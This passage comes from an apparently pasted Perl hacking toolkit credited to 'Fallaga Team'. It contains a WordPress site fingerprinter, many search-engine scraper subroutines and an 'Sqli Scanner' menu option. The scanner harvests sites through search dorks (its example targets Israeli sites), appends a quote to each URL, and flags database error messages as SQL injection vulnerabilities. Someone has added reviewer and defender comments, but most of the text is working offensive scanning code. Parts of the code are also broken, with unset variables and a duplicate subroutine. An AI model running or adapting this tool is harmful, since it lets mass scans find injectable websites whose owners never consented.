$ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12","Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4","Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML,like Gecko) Chrome/9.1.0.0 Safari/540.0","Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Comodo_Dragon/4.1.1.11 Chrome/4.1.249.1042 Safari/532.5","Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6","Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.1 (KHTML, like Gecko) Maxthon/3.0.8.2 Safari/533.1","Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1","Opera/9.99 (Windows NT 5.1; U; pl) Presto/9.9.9","Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-HK) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5","Seamonkey-1.1.13-1(X11; U; GNU Fedora fc 10) Gecko/20081112","Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Zune 4.0; Tablet PC 2.0; InfoPath.3; .NET4.0C; .NET4.0E)","Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MS-RTC LM 8; .NET4.0C; .NET4.0E; InfoPath.3");
$ua->timeout(10);
my $response=$ua->request($req);
#You can add the wordpress search here
if ($response->is_success) {
# Body fingerprinting: any one of the substrings below marks the site as
# "Positive". Several entries are duplicates or subsets of earlier ones.
 if( $response->content =~ /Powered by WordPress/ ||
$response->content =~ /Site by WordPress/ ||
$response->content =~ /WordPress/ ||
$response->content =~ /wordpress/ ||
$response->content =~ /WORDPRESS/ ||
$response->content =~ /Theme by/ ||
$response->content =~ /Site Theme by/ ||
$response->content =~ /WordPress Theme by/ ||
$response->content =~ /Copyright Theme/ ||
$response->content =~ /Theme for WordPress/ ||
$response->content =~ /Blog pada WordPress.com/ ||
$response->content =~ /Blog at WordPress.com/ ||
$response->content =~ /The Morning After Theme/ ||
$response->content =~ /The Twenty Ten Theme/ ||
$response->content =~ /Proudly powered by WordPress/ ||
$response->content =~ /Plainbox Theme/ ||
$response->content =~ /Wordpress Theme/ ||
$response->content =~ /Modicus Remix Theme/ ||
$response->content =~ /Nishita Photo Blog Theme/ ||
$response->content =~ /Theme by MyThemeShop/ ||
$response->content =~ /Theme by/ ||
$response->content =~ /Futurosity Aperio Prototype/ ||
$response->content =~ /Get the Theme for Free/ ||
$response->content =~ /Brightness Theme/ ||
$response->content =~ /Noname Theme/ ||
$response->content =~ /Overstand Theme/ ||
$response->content =~ /Disire Portfolio/ ||
$response->content =~ /Delicacy Food/ ||
$response->content =~ /Diary Theme/ ||
$response->content =~ /Facebook Theme/ ||
$response->content =~ /NuBlue Theme/ ||
$response->content =~ /GreenLife Theme/ ||
$response->content =~ /JEEZ Business Theme/ ||
$response->content =~ /Favor HD Magazine Theme/ ||
$response->content =~ /Mason Jar Theme/ ||
$response->content =~ /Radion Theme/ ||
$response->content =~ /Clearly Theme/ ||
$response->content =~ /Kreativo Theme/ ||
$response->content =~ /My Baby Theme/ ||
$response->content =~ /Design Agency Theme/ ||
$response->content =~ /Isabelle Theme/ ||
$response->content =~ /Cotton Theme/ ||
$response->content =~ /ProjectFlow Theme/ ||
$response->content =~ /WordPress.com/ ||
$response->content =~ /Free Theme by/ ||
$response->content =~ /Paid Theme by/ ||
$response->content =~ /Get Free Theme/ ||
$response->content =~ /Get Paid Theme/ ||
$response->content =~ /Oleh WordPress/ ||
$response->content =~ /INDEX OF/ ||
$response->content =~ /Plugins WordPress/ ||
$response->content =~ /readme.html/ ||
$response->content =~ /WordPress version 3.3.1/ ||
$response->content =~ /WordPress version 3./ ||
$response->content =~ /WordPress site/ ||
$response->content =~ /Get Theme/ ||
$response->content =~ /Blog at Word/ ||
$response->content =~ /WordPress/){
# $print is not assigned in the visible code, so geths() receives an unset value.
my $hs=geths($print); $hosts{$hs}++;
# NOTE(review): `==` binds tighter than the commas, so this condition
# evaluates to its last operand ("10") and is always true.
if($hosts{$hs}=="1","2","3","4","5","6","7","8","9","10"){
print "\n[+] Positive Wordpress site : $wp \n";
}}
# NOTE(review): $re is not assigned in the visible code; unless it is set
# elsewhere in the file these tests run against an unset value -- confirm.
elsif($re =~ /not found/ ||
$re =~ /404 NOT FOUND/ ||
$re =~ /Not Found/ ||
$re =~ /NOT FOUND/ ||
$re =~ /404/ ||
$re =~ /Error/ ||
$re =~ /error/ ||
$re =~ /ERROR/ ||
$re =~ /Page Not Found/)
{
my $hs=geths($print); $hosts{$hs}++;
if($hosts{$hs}=="1","2","3","4","5","6","7","8","9","10"){
print "\n[-] Negative Wordpress site : $wp \n";
}}
}}
print "\n\t\t --==Fallaga Team Here==--\n";
exit;
  1635. #Sub Search Engine
  1636. ################Bing
# Collect result hosts for the search term in $_[0] from Bing's HTML results.
# Two pages are requested (first=0 and first=300) through query(); every
# `<a href="http://...">` target that does not mention bing.com is expanded by
# links() and appended to the returned list.
# NOTE(review): a second `sub bing` appears later in this file. Perl keeps
# only the last definition of a named sub, so which body actually runs should
# be confirmed when analysing the sample.
sub bing() {
    my @lst;
    my $key = $_[0];
    for (my $b=0; $b<=300; $b+=300) {
        my $go = ("http://www.bing.com/search?q=".&key($key)."&filt=all&first=".$b."&FORM=PERE");
        my $res = &query($go);
        # "Ref A/B/C" presumably marks a Bing error page -- confirm. Setting
        # $b to 300 makes this the final pass of the loop.
        if ($res =~ m/Ref A:/g && $res =~ m/Ref B:/g && $res =~ m/Ref C:/g) {$b=300;}
        while ($res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g) {
            # A failed !~ test leaves $1 from the enclosing match intact.
            if ($1 !~ /bing\.com/) {
            my $k = $1;
                my @grep = &links($k);
                push(@lst,@grep);
            }
        }
    }
    return @lst;
}
  1654. ################################################
  1655.  
# Fetch one URL over a raw TCP socket and return everything read from it.
# The "http://" prefix is stripped, the host part is isolated with a regex and
# the remainder becomes the request path; a plain HTTP/1.0 GET is then written
# to port 80. The returned string is the socket's lines joined by "@r"
# interpolation, response headers included. If the connection fails, the eval
# block returns early and the sub returns "".
sub query($){
my $url=$_[0];
$url=~s/http:\/\///;
my $host=$url;
my $query=$url;
my $page="";
$host=~s/href=\"?http:\/\///;
$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
# NOTE(review): $host is interpolated as a regex without \Q...\E, so its dots
# act as wildcards; this matters if a caller passes a URL taken from
# untrusted content.
$query=~s/$host//;
if ($query eq "") {$query="/";};
# No timeout is set on the socket, and errors raised inside the eval are discarded.
eval {
my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
my @r = <$sock>;
$page="@r";
close($sock);
};
return $page;
}
  1675.  
  1676. sub unici{
  1677. my @unici = ();
  1678. my %visti = ();
  1679. foreach my $elemento ( @_ )
  1680. {
  1681. next if $visti{ $elemento }++;
  1682. push @unici, $elemento;
  1683. }
  1684. return @unici;
  1685. }
  1686.  
  1687. sub geths(){
  1688. my $host=$_[0];
  1689. $host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
  1690. return $host;
  1691. }
  1692.  
  1693. sub key(){
  1694. my $chiave=$_[0];
  1695. $chiave =~ s/ /\+/g;
  1696. $chiave =~ s/:/\%3A/g;
  1697. $chiave =~ s/\//\%2F/g;
  1698. $chiave =~ s/&/\%26/g;
  1699. $chiave =~ s/\"/\%22/g;
  1700. $chiave =~ s/,/\%2C/g;
  1701. $chiave =~ s/\\/\%5C/g;
  1702. return $chiave;
  1703. }
  1704.  
  1705. sub links()
  1706. {
  1707. my @l;
  1708. my $link=$_[0];
  1709. my $host=$_[0];
  1710. my $hdir=$_[0];
  1711. $hdir=~s/(.*)\/[^\/]*$/\1/;
  1712. $host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
  1713. $host.="/";
  1714. $link.="/";
  1715. $hdir.="/";
  1716. $host=~s/\/\//\//g;
  1717. $hdir=~s/\/\//\//g;
  1718. $link=~s/\/\//\//g;
  1719. push(@l,$link,$host,$hdir);
  1720. return @l;
  1721. }
  1722. }}
  1723. if($targett eq '1x')
  1724. {
  1725. system('title About Me');
  1726. print "Creator : Fallag crx\n";
  1727. print "Mail : Fallag crx[at]mail[.]ru | Facebook ID : X.cripton.x \n";
  1728. print "Special Thanks to : Fallaga Team | x_spider_tn | Storm Shadow| HAnnibal-XYZ| TN Ghost | CollabTn| © Tn. White/Black  HAckers © \n";
  1729. system("pause");
  1730. }
# Menu option 12: search-engine-driven SQL error scanner. Reads a search term
# from STDIN, runs it through the per-engine collector subs, merges the
# results and passes them through clean(), then requests each entry with a
# single quote appended and matches the response against known database error
# messages (MySQL, MS SQL Server, MS Access/JET). Matches are printed and
# handed to printlog(). getcontent(), printlog(), clean() and several of the
# collectors are defined outside this view.
# Defender notes: the probe is one request whose URL ends in "'", and it only
# produces a hit when the application echoes raw database errors to the
# client. Parameterised queries and generic error pages remove both the flaw
# and the signal, and request logs showing URLs that end in a bare quote are
# a cheap detection point.
if($targett eq '12')
{
system('cls');
system('title Sqli Scanner');
                   {
use HTTP::Request;
use LWP::UserAgent;
use IO::Socket;
use Socket;
use URI::Escape;
use POSIX qw(strftime);

if ($^O =~ /Win/){
system ('cls');
}else{
system ('clear');
}
# Time is captured once here; every log entry below reuses this start time.
my ($sec,$min,$hour,$day,$mon,$year,$wday,$yday,$isdst)=localtime();
# $uagent is not referenced again in the visible code.
my $uagent    = "Mozilla/5.0 (Windows NT 5.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1";
print q {
SQLi scanner
};
print q(
SQLi scanner
);
print "---------------------------------------------------------
[!] Options
[!] example
[!] Dork : product.php?id= +site:il +you have an error in your sql
---------------------------------------------------------\n";
print "[?] Dork for scanning : ";
my $dork = <STDIN>;
chomp $dork;
$ngitung = 0;
my %hosts;
print "---------------------------------------------------------
[!] Scanning info
---------------------------------------------------------
[+] Time : $hour:$min:$sec
[+] Dork : $dork
---------------------------------------------------------
[!] Scanning started....
---------------------------------------------------------";
#Search Engine
# Each collector is called in turn with the same search term, and its result
# count is printed. The calls run sequentially.
my @bing = &bing($dork);
print "\n[+] Bing      get ".scalar(@bing)." Sites";
my @irlandia = &irlandia($dork);
print "\n[+] Irlanda  get ".scalar(@irlandia)." Sites";
my @indonesia = &indonesia($dork);
print "\n[+] Indonesia get ".scalar(@indonesia)." Sites";
my @thailand = &thailand($dork);
print "\n[+] Thailand  get ".scalar(@thailand)." Sites";
my @argentina = &argentina($dork);
print "\n[+] Argentina get ".scalar(@argentina)." Sites";
my @singapura = &singapura($dork);
print "\n[+] Singapura get ".scalar(@singapura)." Sites";
my @malaysia = &malaysia($dork);
print "\n[+] Malaysia  get ".scalar(@malaysia)." Sites";
my @vietnam = &vietnam($dork);
print "\n[+] Vietnam   get ".scalar(@vietnam)." Sites";
my @rusia = &rusia($dork);
print "\n[+] Russia    get ".scalar(@rusia)." Sites";
my @czech = &czech($dork);
print "\n[+] Czech     get ".scalar(@czech)." Sites";
my @belanda = &belanda($dork);
print "\n[+] Belanda   get ".scalar(@belanda)." Sites";
my @australia = &australia($dork);
print "\n[+] Australia get ".scalar(@australia)." Sites";
my @brasil = &brasil($dork);
print "\n[+] Brasil    get ".scalar(@brasil)." Sites";
my @kanada = &canada($dork);
print "\n[+] Canada    get ".scalar(@kanada)." Sites";
my @jerman = &jerman($dork);
print "\n[+] Germany   get ".scalar(@jerman)." Sites";
my @spanyol = &spanyol($dork);
print "\n[+] Spanyol   get ".scalar(@spanyol)." Sites";
my @perancis = &perancis($dork);
print "\n[+] Perancis  get ".scalar(@perancis)." Sites";
my @italia = &italia($dork);
print "\n[+] Talia     get ".scalar(@italia)." Sites";
my @inggris = &inggris($dork);
print "\n[+] Inggris   get ".scalar(@inggris)." Sites";
my @turki = &turki($dork);
print "\n[+] Turkiya   get ".scalar(@turki)." Sites";
my @polandia = &polandia($dork);
print "\n[+] Polandia  get ".scalar(@polandia)." Sites";
my @filipina = &filipina($dork);
print "\n[+] philipine get ".scalar(@filipina)." Sites";
my @peru = &peru($dork);
print "\n[+] Peru      get ".scalar(@peru)." Sites";
my @hongkong = &hongkong($dork);
print "\n[+] Hongkong  get ".scalar(@hongkong)." Sites";
my @finlandia = &finlandia($dork);
print "\n[+] Finlandia get ".scalar(@finlandia)." Sites";
my @yunani = &yunani($dork);
print "\n[+] Yunan     get ".scalar(@yunani)." Sites";
my @kolombia = &kolombia($dork);
print "\n[+] Colombia  get ".scalar(@kolombia)." Sites";
my @taiwan = &taiwan($dork);
print "\n[+] Taiwan    get ".scalar(@taiwan)." Sites";
my @swiss = &swiss($dork);
print "\n[+] Swiss     get ".scalar(@swiss)." Sites";
my @mexico = &mexico($dork);
print "\n[+] Meksiko   get ".scalar(@mexico)." Sites";
my @korea = &korea($dork);
print "\n[+] Korea     get ".scalar(@korea)." Sites";
my @india = &india($dork);
print "\n[+] India     get ".scalar(@india)." Sites";
my @swedia = &swedia($dork);
print "\n[+] Swedia    get ".scalar(@swedia)." Sites";
my @Uk = &Uk(dork);
print "\n[+] U.kingdom get ".scalar(@Uk)." Sites";
my @french = &Israel($dork);
print "\n[+] Israel    get ".scalar(@israel)." Sites";
my @french = &french($dork);
print "\n[+] french    get ".scalar(@french)." Sites";
my @Tunisia = &Tunisia($dork);
print "\n[+] Tunisia   get ".scalar(@Tunisia)." Sites";
print "\n---------------------------------------------------------";
print "\n[!] Searching vulnerable sites";
print "\n[!] Please wait...\n";
print "---------------------------------------------------------\n";
# Merge every collector's list, then pass it through clean() (defined outside
# this view) before probing.
push(my @tot, @bing, @irlandia, @indonesia, @thailand, @argentina, @singapura, @malaysia, @vietnam, @swedia, @rusia, @czech, @belanda,
@australia, @brasil, @kanada, @jerman, @spanyol, @perancis, @italia, @inggris, @turki, @polandia, @filipina, @peru, @hongkong, @yunani,
@finlandia, @kolombia, @taiwan, @swiss, @mexico, @korea, @india, @irlandia,@Tunisia,@french,@israel,@Uk);
my @bersih=&clean(@tot);
my $akhir=scalar(@bersih);
foreach my $situs (@bersih) {
$ngitung++;
if ($ngitung==$akhir-1){
print "\n[!] Scan finish for $dork :D";
}
# The whole probe is the entry with one trailing single quote.
my $expl="http://".$situs."'";
my $mysql = "MySQL";
my $mssql = "MsSQL";
my $msacc = "MsAcces";
my $string = getcontent($expl);
# Classification is purely by error text found in the response body.
if ( $string =~ m/You have an error in your SQL syntax/i || $string =~ m/Query failed/i || $string =~ m/SQL query failed/i ){
print "[*] MySQL vuln for SQLi on $situs\n";
printlog ("
Time     : $hour:$min:$sec
Site     : $situs
Database : $mysql\n");
}
elsif ( $string =~ m/ODBC SQL Server Driver/i || $string =~ m/Unclosed quotation mark/i || $string =~ m/Microsoft OLE DB Provider for/i ){
print "[*] MsSQL vuln for SQLi on $vuln\n";
printlog ("
Time     : $hour:$min:$sec
Site     : $situs
Database : $mssql\n");
}
elsif ( $string =~ m/Microsoft JET Database/i || $string =~ m/ODBC Microsoft Access Driver/i ){
print "[*] MsAcces vuln for SQLi on $vuln\n";
printlog ("
Time     : $hour:$min:$sec
Site     : $situs
Database : $msacc\n");
}
}
exit;
  1891. #Search Engine
# Result collector for www.bing.com. Requests result offsets 1, 11, ... 191
# (twenty pages) through search_engine_query(), which is defined outside this
# view, and extracts every `<a href="http://...">` target from the returned
# text. Targets that do not contain "google" are expanded by links() and
# appended to the returned list.
sub bing() {
   my @list;
   my $key = $_[0];
   for (my $i=1; $i<=200; $i+=10) {
       my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&first=".$i);
       my $res = &search_engine_query($search);
       while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) {
                       my $link = $1;
           if ($link !~ /google/) {
               my @grep = &links($link);
               push(@list,@grep);
           }
       }
   }
   return @list;
}
  1908.  
# Result collector for id.search.yahoo.com. Requests two pages (b=1 and
# b=101, with n=100) through search_engine_query(), defined outside this
# view, and pulls every "http%3a//<host>/" fragment out of the returned text.
# Hosts that do not mention yahoo.com are stripped of "<" and spaces, expanded
# by links(), and appended to the returned list. $b is declared but not used.
sub indonesia() {
   my @list;
 my $key = $_[0];
 my $b   = 0;
   for (my $i=1; $i<=200; $i+=100) {
       my $search = ("http://id.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
       my $res = &search_engine_query($search);
       while ($res =~ m/http\%3a\/\/(.+?)\//g) {
           if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
           }
       }
   } return @list;
}
  1922.  
# Result collector for in.search.yahoo.com. Requests two pages (b=1 and
# b=101, with n=100) through search_engine_query(), defined outside this
# view, and pulls every "http%3a//<host>/" fragment out of the returned text.
# Hosts that do not mention yahoo.com are stripped of "<" and spaces, expanded
# by links(), and appended to the returned list. $b is declared but not used.
sub india() {
   my @list;
 my $key = $_[0];
 my $b   = 0;
   for (my $i=1; $i<=200; $i+=100) {
       my $search = ("http://in.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
       my $res = &search_engine_query($search);
       while ($res =~ m/http\%3a\/\/(.+?)\//g) {
           if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
           }
       }
   } return @list;
}
  1936.  
# Result collector for ie.search.yahoo.com. Requests two pages (b=1 and
# b=101, with n=100) through search_engine_query(), defined outside this
# view, and pulls every "http%3a//<host>/" fragment out of the returned text.
# Hosts that do not mention yahoo.com are stripped of "<" and spaces, expanded
# by links(), and appended to the returned list. $b is declared but not used.
sub irlandia() {
   my @list;
 my $key = $_[0];
 my $b   = 0;
   for (my $i=1; $i<=200; $i+=100) {
       my $search = ("http://ie.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
       my $res = &search_engine_query($search);
       while ($res =~ m/http\%3a\/\/(.+?)\//g) {
           if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
           }
       }
   } return @list;
}
  1950.  
# Result collector for kr.search.yahoo.com. Requests two pages (b=1 and
# b=101, with n=100) through search_engine_query(), defined outside this
# view, and pulls every "http%3a//<host>/" fragment out of the returned text.
# Hosts that do not mention yahoo.com are stripped of "<" and spaces, expanded
# by links(), and appended to the returned list. $b is declared but not used.
sub korea() {
   my @list;
 my $key = $_[0];
 my $b   = 0;
   for (my $i=1; $i<=200; $i+=100) {
       my $search = ("http://kr.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
       my $res = &search_engine_query($search);
       while ($res =~ m/http\%3a\/\/(.+?)\//g) {
           if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
           }
       }
   } return @list;
}
  1964.  
# Result collector for th.search.yahoo.com. Requests two pages (b=1 and
# b=101, with n=100) through search_engine_query(), defined outside this
# view, and pulls every "http%3a//<host>/" fragment out of the returned text.
# Hosts that do not mention yahoo.com are stripped of "<" and spaces, expanded
# by links(), and appended to the returned list. $b is declared but not used.
sub thailand() {
   my @list;
 my $key = $_[0];
 my $b   = 0;
   for (my $i=1; $i<=200; $i+=100) {
       my $search = ("http://th.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
       my $res = &search_engine_query($search);
       while ($res =~ m/http\%3a\/\/(.+?)\//g) {
           if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
           }
       }
   } return @list;
}
  1978.  
# Result collector for ar.search.yahoo.com. Requests two pages (b=1 and
# b=101, with n=100) through search_engine_query(), defined outside this
# view, and pulls every "http%3a//<host>/" fragment out of the returned text.
# Hosts that do not mention yahoo.com are stripped of "<" and spaces, expanded
# by links(), and appended to the returned list. $b is declared but not used.
sub argentina() {
   my @list;
 my $key = $_[0];
 my $b   = 0;
   for (my $i=1; $i<=200; $i+=100) {
       my $search = ("http://ar.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
       my $res = &search_engine_query($search);
       while ($res =~ m/http\%3a\/\/(.+?)\//g) {
           if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
           }
       }
   } return @list;
}
  1992.  
# Result collector for sg.search.yahoo.com. Requests two pages (b=1 and
# b=101, with n=100) through search_engine_query(), defined outside this
# view, and pulls every "http%3a//<host>/" fragment out of the returned text.
# Hosts that do not mention yahoo.com are stripped of "<" and spaces, expanded
# by links(), and appended to the returned list. $b is declared but not used.
sub singapura() {
   my @list;
 my $key = $_[0];
 my $b   = 0;
   for (my $i=1; $i<=200; $i+=100) {
       my $search = ("http://sg.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
       my $res = &search_engine_query($search);
       while ($res =~ m/http\%3a\/\/(.+?)\//g) {
           if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
           }
       }
   } return @list;
}
  2006.  
# Result collector for malaysia.search.yahoo.com. Requests two pages (b=1 and
# b=101, with n=100) through search_engine_query(), defined outside this
# view, and pulls every "http%3a//<host>/" fragment out of the returned text.
# Hosts that do not mention yahoo.com are stripped of "<" and spaces, expanded
# by links(), and appended to the returned list. $b is declared but not used.
sub malaysia() {
   my @list;
 my $key = $_[0];
 my $b   = 0;
   for (my $i=1; $i<=200; $i+=100) {
       my $search = ("http://malaysia.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
       my $res = &search_engine_query($search);
       while ($res =~ m/http\%3a\/\/(.+?)\//g) {
           if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
           }
       }
   } return @list;
}
  2020.  
# Result collector for vn.search.yahoo.com. Requests two pages (b=1 and
# b=101, with n=100) through search_engine_query(), defined outside this
# view, and pulls every "http%3a//<host>/" fragment out of the returned text.
# Hosts that do not mention yahoo.com are stripped of "<" and spaces, expanded
# by links(), and appended to the returned list. $b is declared but not used.
sub vietnam() {
   my @list;
 my $key = $_[0];
 my $b   = 0;
   for (my $i=1; $i<=200; $i+=100) {
       my $search = ("http://vn.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
       my $res = &search_engine_query($search);
       while ($res =~ m/http\%3a\/\/(.+?)\//g) {
           if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
           }
       }
   } return @list;
}
  2034.  
# Result collector for se.search.yahoo.com. Requests two pages (b=1 and
# b=101, with n=100) through search_engine_query(), defined outside this
# view, and pulls every "http%3a//<host>/" fragment out of the returned text.
# Hosts that do not mention yahoo.com are stripped of "<" and spaces, expanded
# by links(), and appended to the returned list. $b is declared but not used.
sub swedia() {
   my @list;
 my $key = $_[0];
 my $b   = 0;
   for (my $i=1; $i<=200; $i+=100) {
       my $search = ("http://se.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
       my $res = &search_engine_query($search);
       while ($res =~ m/http\%3a\/\/(.+?)\//g) {
           if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
           }
       }
   } return @list;
}
  2048.  
# Result collector for ru.search.yahoo.com. Requests two pages (b=1 and
# b=101, with n=100) through search_engine_query(), defined outside this
# view, and pulls every "http%3a//<host>/" fragment out of the returned text.
# Hosts that do not mention yahoo.com are stripped of "<" and spaces, expanded
# by links(), and appended to the returned list. $b is declared but not used.
sub rusia() {
   my @list;
 my $key = $_[0];
 my $b   = 0;
   for (my $i=1; $i<=200; $i+=100) {
       my $search = ("http://ru.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
       my $res = &search_engine_query($search);
       while ($res =~ m/http\%3a\/\/(.+?)\//g) {
           if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
           }
       }
   } return @list;
}
  2062.  
# Result collector for cs.search.yahoo.com. Requests two pages (b=1 and
# b=101, with n=100) through search_engine_query(), defined outside this
# view, and pulls every "http%3a//<host>/" fragment out of the returned text.
# Hosts that do not mention yahoo.com are stripped of "<" and spaces, expanded
# by links(), and appended to the returned list. $b is declared but not used.
sub czech() {
   my @list;
 my $key = $_[0];
 my $b   = 0;
   for (my $i=1; $i<=200; $i+=100) {
       my $search = ("http://cs.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
       my $res = &search_engine_query($search);
       while ($res =~ m/http\%3a\/\/(.+?)\//g) {
           if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
           }
       }
   } return @list;
}
  2076.  
# Result collector for nl.search.yahoo.com. Requests two pages (b=1 and
# b=101, with n=100) through search_engine_query(), defined outside this
# view, and pulls every "http%3a//<host>/" fragment out of the returned text.
# Hosts that do not mention yahoo.com are stripped of "<" and spaces, expanded
# by links(), and appended to the returned list. $b is declared but not used.
sub belanda() {
   my @list;
 my $key = $_[0];
 my $b   = 0;
   for (my $i=1; $i<=200; $i+=100) {
       my $search = ("http://nl.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
       my $res = &search_engine_query($search);
       while ($res =~ m/http\%3a\/\/(.+?)\//g) {
           if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
           }
       }
   } return @list;
}
  2090.  
# Result collector for au.search.yahoo.com. Requests two pages (b=1 and
# b=101, with n=100) through search_engine_query(), defined outside this
# view, and pulls every "http%3a//<host>/" fragment out of the returned text.
# Hosts that do not mention yahoo.com are stripped of "<" and spaces, expanded
# by links(), and appended to the returned list. $b is declared but not used.
sub australia() {
   my @list;
 my $key = $_[0];
 my $b   = 0;
   for (my $i=1; $i<=200; $i+=100) {
       my $search = ("http://au.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
       my $res = &search_engine_query($search);
       while ($res =~ m/http\%3a\/\/(.+?)\//g) {
           if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
           }
       }
   } return @list;
}
  2104.  
# Result collector for br.search.yahoo.com. Requests two pages (b=1 and
# b=101, with n=100) through search_engine_query(), defined outside this
# view, and pulls every "http%3a//<host>/" fragment out of the returned text.
# Hosts that do not mention yahoo.com are stripped of "<" and spaces, expanded
# by links(), and appended to the returned list. $b is declared but not used.
sub brasil() {
   my @list;
 my $key = $_[0];
 my $b   = 0;
   for (my $i=1; $i<=200; $i+=100) {
       my $search = ("http://br.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
       my $res = &search_engine_query($search);
       while ($res =~ m/http\%3a\/\/(.+?)\//g) {
           if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
           }
       }
   } return @list;
}
  2118.  
# Result collector for ca.search.yahoo.com. Requests two pages (b=1 and
# b=101, with n=100) through search_engine_query(), defined outside this
# view, and pulls every "http%3a//<host>/" fragment out of the returned text.
# Hosts that do not mention yahoo.com are stripped of "<" and spaces, expanded
# by links(), and appended to the returned list. $b is declared but not used.
sub canada() {
   my @list;
 my $key = $_[0];
 my $b   = 0;
   for (my $i=1; $i<=200; $i+=100) {
       my $search = ("http://ca.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
       my $res = &search_engine_query($search);
       while ($res =~ m/http\%3a\/\/(.+?)\//g) {
           if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
           }
       }
   } return @list;
}
  2132.  
  2133. sub jerman() {
  2134.    my @list;
  2135.  my $key = $_[0];
  2136.  my $b   = 0;
  2137.    for (my $i=1; $i<=200; $i+=100) {
  2138.        my $search = ("http://de.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
  2139.        my $res = &search_engine_query($search);
  2140.        while ($res =~ m/http\%3a\/\/(.+?)\//g) {
  2141.            if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
  2142.            }
  2143.        }
  2144.    } return @list;
  2145. }
  2146.  
  2147. sub spanyol() {
  2148.    my @list;
  2149.  my $key = $_[0];
  2150.  my $b   = 0;
  2151.    for (my $i=1; $i<=200; $i+=100) {
  2152.        my $search = ("http://es.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
  2153.        my $res = &search_engine_query($search);
  2154.        while ($res =~ m/http\%3a\/\/(.+?)\//g) {
